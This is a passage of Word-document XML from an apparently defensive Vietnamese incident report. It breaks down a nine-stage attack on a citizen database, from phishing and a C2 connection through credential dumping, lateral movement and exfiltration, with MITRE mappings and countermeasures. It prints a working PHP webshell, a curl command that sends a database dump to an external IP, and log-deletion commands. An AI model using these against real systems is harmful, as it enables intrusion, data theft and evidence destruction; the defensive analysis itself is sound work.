            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đối tượng thực hiện xóa toàn bộ dấu vết hoạt động trên cả WEB-SERVER và DB-SERVER: xóa nhật ký Apache (rm /var/log/apache2/access.log /var/log/apache2/error.log), xóa webshell (rm /var/www/html/uploads/img_cache.php), xóa file dump (rm /tmp/data.sql.gz), xóa nhật ký MySQL (mysql -e "DELETE FROM mysql.general_log;") và làm sạch lịch sử lệnh (history -c &amp;&amp; unset HISTFILE). Tuy nhiên, hệ thống SIEM đã forward log realtime về server riêng trước khi các lệnh xóa được thực thi — toàn bộ bản ghi vẫn còn tồn tại và không thể bị xóa từ xa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="004B3F33">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="60" w:after="100" w:line="320" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(*) Ghi chú: Ký hiệu "CLIENT" là máy tính nạn nhân (192.168.1.100 — Windows 10 Pro, user nhanvien01). "WEB SERVER" là máy chủ web nội bộ (192.168.1.10 — Ubuntu 22.04, Apache2/PHP). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"DATABASE" là máy chủ cơ sở dữ liệu (192.168.1.20 — Ubuntu 22.04, MySQL 8.0) quản lý thông tin công dân.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="004B3F33">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDD7EE"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>IV. DIỄN GIẢI CHI TIẾT TỪNG GIAI ĐOẠN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Giai đoạn 1: Lừa đảo trực tuyến có chọn lọc (Spear Phishing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Đây là điểm khởi đầu của toàn bộ chuỗi tấn công và là giai đoạn đòi hỏi sự chuẩn bị kỹ lưỡng nhất về mặt kỹ thuật xã hội học (Social Engineering). Đối tượng đăng ký tên miền giả mạo ubnd-tinhquangninh.info (domain mới, chỉ đăng ký 1 ngày) và sử dụng công cụ phishing framework Gophish để soạn và gửi email spear-phishing nhắm mục tiêu cụ thể với nội dung giả mạo báo cáo tài chính UBND tỉnh Quảng Ninh. File đính kèm BaoCaoTaiChinh_Q1-2024.pdf.exe được đặt tên theo đúng quy ước văn bản hành chính nhằm đánh lừa người nhận. Khi kiểm tra header email, các trường SPF FAIL, DKIM absent và X-Mailer chứa dấu hiệu công cụ phishing là những chỉ số nhận diện quan trọng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Về mặt kỹ thuật, trên hệ thống Windows, phần mở rộng .exe thường bị ẩn bởi mặc định, khiến tên file hiển thị với người dùng là BaoCaoTaiChinh_Q1.pdf — đây là kỹ thuật Double Extension khai thác cài đặt mặc định của hệ điều hành. File thực thi được ký số giả mạo hoặc không ký nhằm qua mặt cơ chế cảnh báo SmartScreen trong một số phiên bản Windows cũ hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="60" w:after="100" w:line="320" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→ Chiến thuật MITRE ATT&amp;CK tương ứng: T1566.001 — Spear Phishing Attachment. Chỉ số IoC: domain giả mạo, file PE32 với phần mở rộng kép.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Giai đoạn 2: Thực thi mã độc và kết nối C2 (Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ngay khi người dùng nhấp đúp vào file đính kèm, tiến trình độc hại được nạp vào bộ nhớ (In-Memory Execution) và khởi tạo kết nối ngược (Reverse Connection) đến máy chủ C2 của đối tượng trên cổng 4444 nhằm lẫn trong lưu lượng hợp lệ. RAT sau khi khởi chạy thực hiện ghi giá trị khởi động cùng hệ thống thông qua Registry Key HKCU\Software\Microsoft\Windows\CurrentVersion\Run, đảm bảo duy trì quyền kiểm soát ngay cả sau khi máy tính khởi động lại.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trên màn hình quản lý tiến trình, xuất hiện tiến trình svchost32.exe (lưu ý: tên gần giống tiến trình hệ thống svchost.exe nhưng có thêm "32" — đây là kỹ thuật process masquerading) chạy dưới quyền người dùng thông thường từ đường dẫn bất thường %TEMP%\svchost32.exe thay vì C:\Windows\System32. Tiến trình này thiết lập kết nối </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TCP ESTABLISHED đến địa chỉ 45.134.212.77 trên cổng 4444 — đặc trưng của Metasploit Meterpreter C2. EventID 4688 (Process Creation) ghi nhận tiến trình độc hại khởi chạy với parent process là explorer.exe thay vì services.exe như svchost.exe thật.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="60" w:after="100" w:line="320" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→ Chiến thuật MITRE ATT&amp;CK tương ứng: T1059.003 — Command and Scripting Interpreter: Windows Command Shell; T1036.005 — Masquerading: Match Legitimate Name or Location. Chỉ số IoC: tiến trình svchost32.exe từ %TEMP% với kết nối TCP ra ngoài cổng 4444, parent process là explorer.exe (bất thường), EventID 4688.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Giai đoạn 3: Duy trì quyền kiểm soát (Persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Song song với quá trình thực thi, malware thiết lập ngay cơ chế duy trì quyền kiểm soát (Persistence) theo hai vector nhằm đảm bảo tiếp tục hoạt động sau khi hệ thống khởi động lại hoặc tiến trình bị terminate. Vector thứ nhất là ghi Registry Run Key: tạo giá trị WindowsDefend32 tại HKLM\Software\Microsoft\Windows\CurrentVersion\Run với dữ liệu trỏ đến C:\Users\NHVIEN~1\AppData\Local\Temp\svchost32.exe — đảm bảo malware tự khởi động mỗi khi Windows khởi động. Hành vi này được ghi nhận qua EventID 4657 (Registry value được SET bởi tiến trình svchost32.exe PID 4821).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Vector thứ hai là tạo Scheduled Task giả mạo với tên \Microsoft\Windows\UpdateAssistant\Assistant, chạy dưới quyền SYSTEM với chu kỳ kích hoạt mỗi 5 phút — đảm bảo malware tự động khởi động lại nếu bị Blue Team terminate tiến trình. Hành vi này được ghi nhận qua EventID 4698 (Scheduled Task mới được tạo bởi svchost32.exe — bất thường vì tiến trình người dùng thông thường không có lý do tạo Scheduled Task chạy với quyền SYSTEM). Biện pháp khắc phục: thực thi reg delete HKLM\...\Run\WindowsDefend32 /f và schtasks /delete /tn "\Microsoft\Windows\UpdateAssistant\Assistant" /f.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="60" w:after="100" w:line="320" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→ Chiến thuật MITRE ATT&amp;CK tương ứng: T1547.001 — Boot/Logon Autostart Execution: Registry Run Keys; T1053.005 — Scheduled Task/Job: Scheduled Task. Chỉ số IoC: Registry Run key bất thường tại HKLM\...\Run\WindowsDefend32, Scheduled Task được tạo bởi tiến trình người dùng với quyền SYSTEM (EventID 4657, 4698).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Giai đoạn 4: Đánh cắp thông tin xác thực qua LSASS Dump (Credential Access)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Từ phiên C2, đối tượng thực hiện leo thang đặc quyền lên SYSTEM thông qua kỹ thuật Named Pipe Impersonation (lệnh getsystem trên Meterpreter), sau đó nạp module Mimikatz (load kiwi) và thực thi lệnh creds_msv để đọc trực tiếp bộ nhớ tiến trình lsass.exe — nơi Windows lưu trữ thông tin xác thực các phiên đăng nhập đang hoạt động dưới dạng </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NTLM hash và cleartext password. Kết quả dump thu được thông tin tài khoản nhanvien01 (NTLM: a3b4c5d6e7f8...) và đặc biệt là tài khoản adminIT (NTLM: 1a2b3c4d5e6f...) — tài khoản domain admin có quyền truy cập toàn bộ hạ tầng nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hành vi đọc bộ nhớ lsass.exe được ghi nhận qua EventID 4662 (An operation was performed on an object — Access: PROCESS_VM_READ, Actor: svchost32.exe PID 4821) và Sysmon Event ID 10 (ProcessAccess to lsass.exe). Với thông tin xác thực của adminIT trong tay, đối tượng có khả năng đăng nhập vào bất kỳ máy nào trong mạng nội bộ qua SSH, RDP hoặc SMB mà không cần khai thác thêm bất kỳ lỗ hổng nào — đây là bước then chốt làm bùng phát phạm vi tấn công từ một máy trạm đơn lẻ ra toàn bộ hạ tầng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="60" w:after="100" w:line="320" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→ Chiến thuật MITRE ATT&amp;CK tương ứng: T1003.001 — OS Credential Dumping: LSASS Memory. Chỉ số IoC: EventID 4662 (PROCESS_VM_READ trên lsass.exe), Sysmon Event 10 (ProcessAccess), tiến trình không phải SYSTEM/lsass đọc bộ nhớ lsass.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Giai đoạn 5: Do thám mạng nội bộ (Discovery)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi nắm được thông tin xác thực domain admin, malware thực hiện do thám mạng nội bộ bằng cách quét toàn bộ dải /24 (192.168.1.0/24) để xác định các host đang hoạt động và các cổng dịch vụ đang mở. Quá trình này tạo ra hàng loạt kết nối TCP SYN trong thời gian rất ngắn — quan sát trên CLIENT-PC thấy hàng chục kết nối trạng thái TIME_WAIT đến các máy trong cùng dải mạng, trong đó xác định được WEB-SERVER (192.168.1.10) đang mở cổng 22 (SSH) và 80 (HTTP), DB-SERVER (192.168.1.20) đang mở cổng 3306 (MySQL). Toàn bộ quá trình quét dải /24 hoàn thành trong khoảng 3 giây.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tốc độ quét bất thường này tạo ra đặc trưng lưu lượng TCP SYN flood từ một địa chỉ nguồn đến toàn dải mạng trong thời gian dưới 5 giây — đây là dấu hiệu điển hình của công cụ quét mạng tự động, kích hoạt cảnh báo severity HIGH trên hệ thống IDS/IPS nếu đã được cấu hình quy tắc phát hiện tương ứng. Hành động đối phó tức thời là cô lập (isolate) ngay máy 192.168.1.100 khỏi mạng nội bộ để ngăn đối tượng tiến hành lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="60" w:after="100" w:line="320" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→ Chiến thuật MITRE ATT&amp;CK tương ứng: T1046 — Network Service Discovery. Chỉ số IoC: TCP SYN flood từ 192.168.1.100 đến toàn dải .0/24 trong dưới 5 giây, cảnh báo IDS severity HIGH, hàng loạt kết nối TIME_WAIT đến các cổng dịch vụ phổ biến.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Giai đoạn 6: Di chuyển ngang hàng — Đăng nhập SSH (Lateral Movement)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sử dụng thông tin xác thực tài khoản adminIT thu được từ bước LSASS Dump, đối tượng thiết lập phiên SSH từ CLIENT-PC (192.168.1.100) vào WEB-SERVER </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(192.168.1.10). Phiên đăng nhập thành công do mật khẩu hợp lệ và dịch vụ SSH không được cấu hình xác thực đa yếu tố (MFA). Nhật ký /var/log/auth.log trên WEB-SERVER ghi nhận sự kiện: adminIT pts/1 192.168.1.100 — điều bất thường vì tài khoản adminIT bình thường chỉ đăng nhập từ máy admin 192.168.1.5, không bao giờ từ máy trạm nhân viên 192.168.1.100. Tuy nhiên, sự kiện này không kích hoạt cảnh báo tự động do thiếu quy tắc phát hiện bất thường hành vi đăng nhập (UEBA) trên hệ thống SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="60" w:after="100" w:line="320" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→ Chiến thuật MITRE ATT&amp;CK tương ứng: T1021.004 — Remote Services: SSH. Chỉ số IoC: SSH login thành công của tài khoản cao quyền từ IP nguồn bất thường (máy trạm nhân viên thay vì máy admin), đăng nhập ngoài pattern thông thường, nhật ký /var/log/auth.log ghi nhận adminIT pts/1 từ 192.168.1.100.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Giai đoạn 7: Triển khai webshell (Collection trên Web Server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi chiếm quyền truy cập SSH, đối tượng upload file webshell PHP được đặt tên ngụy trang là img_cache.php (giả dạng file cache ảnh thông thường) lên thư mục /var/www/html/uploads/ — thư mục dùng để lưu trữ tệp tải lên từ người dùng ứng dụng, nhưng không được cấu hình chính sách cấm thực thi file PHP. Nội dung webshell: &lt;?php if(isset($_GET['cmd'])) { system(base64_decode($_GET['cmd'])); } ?&gt; — nhận lệnh hệ thống qua parameter ?cmd= dưới dạng mã hóa Base64 rồi thực thi trực tiếp trên máy chủ. Nhật ký Apache ghi nhận request: 192.168.1.100 - "GET /uploads/img_cache.php?cmd=aWQ= HTTP/1.1" 200, trong đó base64_decode("aWQ=") = "id" là lệnh đối tượng dùng để kiểm tra webshell. Công cụ file integrity monitoring (AIDE/Tripwire) có thể phát hiện file mới này thông qua lệnh find /var/www -name "*.php" -newer /etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="60" w:after="100" w:line="320" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→ Chiến thuật MITRE ATT&amp;CK tương ứng: T1505.003 — Server Software Component: Web Shell. Chỉ số IoC: file PHP mới xuất hiện trong thư mục /uploads/ không có trong baseline, lệnh HTTP GET với parameter ?cmd= đến /uploads/img_cache.php, file được tạo bởi tiến trình SSH session (không phải ứng dụng web thông thường).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Giai đoạn 8: Truy cập và trích xuất cơ sở dữ liệu (Exfiltration)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Từ giao diện webshell, đối tượng trích xuất thông tin xác thực cơ sở dữ liệu từ file cấu hình ứng dụng (config.php / .env) được lưu công khai trên máy chủ — thường dạng plaintext hoặc chỉ mã hóa Base64 không có giá trị bảo mật thực chất. Đối tượng thiết lập kết nối trực tiếp đến DB-SERVER (192.168.1.20, MySQL 8.0) và xác định cơ sở dữ liệu citizens_db chứa bảng citizens với cấu trúc: ho_ten | cccd | ngay_sinh | dia_chi | dien_thoai — toàn bộ dữ liệu cá nhân nhạy cảm của công dân. Lệnh SELECT COUNT(*) FROM </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>citizens trả về 150.247 bản ghi đang bị truy vấn — sự kiện này xuất hiện trong MySQL processlist dưới dạng tiến trình www-data từ 192.168.1.10 thực hiện query bất thường với quyền cao.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Đối tượng thực hiện dump toàn bộ cơ sở dữ liệu bằng lệnh mysqldump citizens_db &gt; /tmp/data.sql.gz tạo ra file nén dung lượng 8.2MB chứa 150.247 bản ghi thông tin công dân, sau đó truyền về máy chủ C2 qua lệnh curl -F "file=@/tmp/data.sql.gz" http://45.134.212.77/upload. Đây là thiệt hại cốt lõi của toàn bộ chuỗi tấn công: 150.247 hồ sơ dữ liệu công dân bao gồm họ tên, số CCCD, ngày sinh, địa chỉ và số điện thoại — đủ để thực hiện giả mạo danh tính và lừa đảo quy mô lớn. Biện pháp phát hiện: DLP theo dõi luồng dữ liệu khối lượng lớn ra ngoài, MySQL general_log ghi nhận lệnh SELECT * trên bảng nhạy cảm, database firewall giới hạn kết nối chỉ từ app server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="60" w:after="100" w:line="320" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→ Chiến thuật MITRE ATT&amp;CK tương ứng: T1005 — Data from Local System; T1041 — Exfiltration Over C2 Channel. Chỉ số IoC: mysqldump thực thi từ tiến trình webserver (www-data), luồng dữ liệu lớn (8.2MB) ra địa chỉ IP bên ngoài qua curl, MySQL general_log ghi nhận lệnh SELECT * trên toàn bộ bảng citizens.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Giai đoạn 9: Xóa dấu vết hoạt động (Cover Tracks)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Đây là bước cuối cùng trong chuỗi tấn công, nhằm xóa bỏ tối đa chứng cứ hoạt động để gây khó khăn cho quá trình điều tra số (Digital Forensics) sau sự cố. Trên WEB-SERVER, đối tượng thực thi: xóa nhật ký Apache (rm /var/log/apache2/access.log /var/log/apache2/error.log), xóa webshell (rm /var/www/html/uploads/img_cache.php), xóa file dump còn lại (rm /tmp/data.sql.gz) và làm sạch toàn bộ lịch sử lệnh (history -c &amp;&amp; unset HISTFILE). Trên DB-SERVER, đối tượng xóa nhật ký giao dịch MySQL (mysql -e "DELETE FROM mysql.general_log;") và xóa lịch sử lệnh (history -c).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tuy nhiên, nếu hệ thống đã cấu hình forward log realtime về SIEM server riêng biệt (rsyslog/syslog-ng đẩy log về trước khi các lệnh xóa được thực thi), toàn bộ bản ghi nhật ký vẫn còn tồn tại trên SIEM và không thể bị xóa từ xa — đây là nguyên tắc then chốt "Cannot delete what you do not control." Thêm vào đó, kern.log trên Linux cũng không bị xóa vì cần quyền root đặc biệt cao hơn mức đối tượng đang có. Đây là lý do biện pháp forward log realtime về SIEM được xem là biện pháp phòng thủ quan trọng nhất đối với giai đoạn Cover Tracks, đồng thời là cơ sở pháp lý vững chắc cho quá trình điều tra số và truy tố sau này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="60" w:after="100" w:line="320" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>→ Chiến thuật MITRE ATT&amp;CK tương ứng: T1070.002 — Indicator Removal: Clear Linux or Mac System Logs; T1070.003 — Indicator Removal: Clear Command History. Chỉ số IoC: kích thước file log đột ngột về 0, inode change thời gian ngắn, history rỗng sau phiên làm việc, file /uploads/img_cache.php biến mất sau khi xuất hiện — tất cả đều được SIEM ghi nhận nếu đã cấu hình forward log realtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="004B3F33">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDD7EE"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>V. ÁNH XẠ MITRE ATT&amp;CK VÀ ĐỀ XUẤT BIỆN PHÁP ĐỐI PHÓ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Đặt trong bối cảnh toàn bộ chuỗi tấn công, có thể nhận thấy đây là dạng tấn công khai thác điểm yếu tổng hợp từ con người, quy trình và công nghệ. Không có bất kỳ giai đoạn đơn lẻ nào trong chuỗi trên đòi hỏi kỹ năng kỹ thuật cực cao — điều này đồng nghĩa với việc ngay cả các tổ chức có nguồn lực an ninh mạng hạn chế vẫn có thể đối phó hiệu quả nếu triển khai đồng bộ một số biện pháp kiểm soát cơ bản.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
